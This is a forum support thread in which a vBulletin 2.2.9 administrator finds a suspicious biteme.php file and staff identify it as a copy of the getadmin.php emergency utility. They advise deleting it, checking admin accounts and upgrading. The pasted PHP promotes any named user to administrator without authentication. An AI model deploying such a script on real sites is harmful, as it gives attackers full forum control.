I use vB 2.2.9 ( I know I need to upgrade) and I've found a PHP code in my "extras" folder called "biteme.php".

I ran a search in these forums to see if I could find what it does. No luck.

With a name like "biteme", I'm thinking I've been hacked.

Is there a valid PHP code in vB 2.2.9 called "biteme.php"?

You could open that file in any sort of editor to find it out :)

Not that I am aware of.

There has never been a file of that name in any vB distribution. I'd be very concerned.

Also please read this important announcement about a security issue with your version of vB:

http://www.vbulletin.com/forum/showthread.php?p=694180#post694180

Thanks.

I looked at it in notepad, but I know nothing about PHP. Here's what it lookslike:<html><head><title>vBulletin Administrator Utility</title></head>
<body>
<?php
extract($HTTP_GET_VARS);

if ($username=="") {

echo "<form action=\"getadmin.php\" method=get><p>Username to activate: <input type=text name=username></p>";
echo "<p><input type=submit value=\"Make administrator\"></p>";

} else {

include("global.php");

if ($checkadmin=$DB_site->query_first("SELECT cancontrolpanel FROM usergroup WHERE usergroupid=6")) {
if ($checkadmin[cancontrolpanel]!=1) {
$DB_site->query("UPDATE usergroup SET cancontrolpanel=1 WHERE usergroupid=6");
}
} else {
$DB_site->query("INSERT INTO usergroup VALUES (6,'Administrator','Administrator',1,1,1,1,1,1,1,1 ,1,1,1)");
}

$DB_site->query("UPDATE user SET usergroupid=6 WHERE username='".addslashes($username)."'");

echo "<p>Administrator reinstated. Please try to access the <a href='admin/index.php'>control panel</a>.</p>";

}

?>
</body>
</html>

What's it mean? Is it supposed to be there? Am I in trouble? It's making me nervous.

Thanks in advance.

That is definitely a hack attempt. Remove it immediately. Also check all the Admin and Mod accounts on your forums and make sure they haven't been compromised.

I'd also upgrade to at least 2.3.5 if I were you. Your forums are at risk and you could lose everything. I've seen it happen.

Thanks very much Steve. I don't even know how long it's been there.

I don't know much about administering the site either. I've got a lot of reading to do.

Do you mean to use the Admin CP to look at the admin and mod usergroup members?

Actually, the code in your biteme.php is identical to the code in extras/getadmin.php from the vBulletin 2 distribution. It allows the user to promote any member to admin status and is designed to allow emergency access after something terminal happens to an admin account.

If you didn't put the file there, delete it promptly and try to find out who did put it there.

If you did put it there, it's not the sort of script you want to keep around on a public site, delete it promptly.

You should not upload the extras directory to your webserver unless you have a specific maintenance need for it. Delete that too.

Can I point out that we never tell users to upload the extras/ folder!
We only want them to upload 1 file from it, in those situations where they need to run it to help restore something when something is broken. And then immediatly remove it again.

In version 3 this folder is renamed to 'do_not_upload' to make it even more obvious.

Go find out who is admin on your forum and demote those users again if you didn't manually add them as admin.

And delete the extras/ folder from your web server.

Also please note that various versions smaller then 2.3.5 and 3.0.3 are vunreable to security issues. I advise to upgrade.

Thanks very much for the advice.

My Tech Admin left and I haven't found someone to take his place, so I'm trying to learn as much as I can to upgrade to a newer version.

As far as I know, it was he who installed the Extras folder, since he did the last upgrade to 2.2.9. I don't know why the file was named biteme.php or who put it there.

I'm in the process of reading my host's support area and the vB 3 upgrade info and hope to upgrade by the end of the week. There's a lot to read!

Thanks again for the help. I'll delete that folder right away.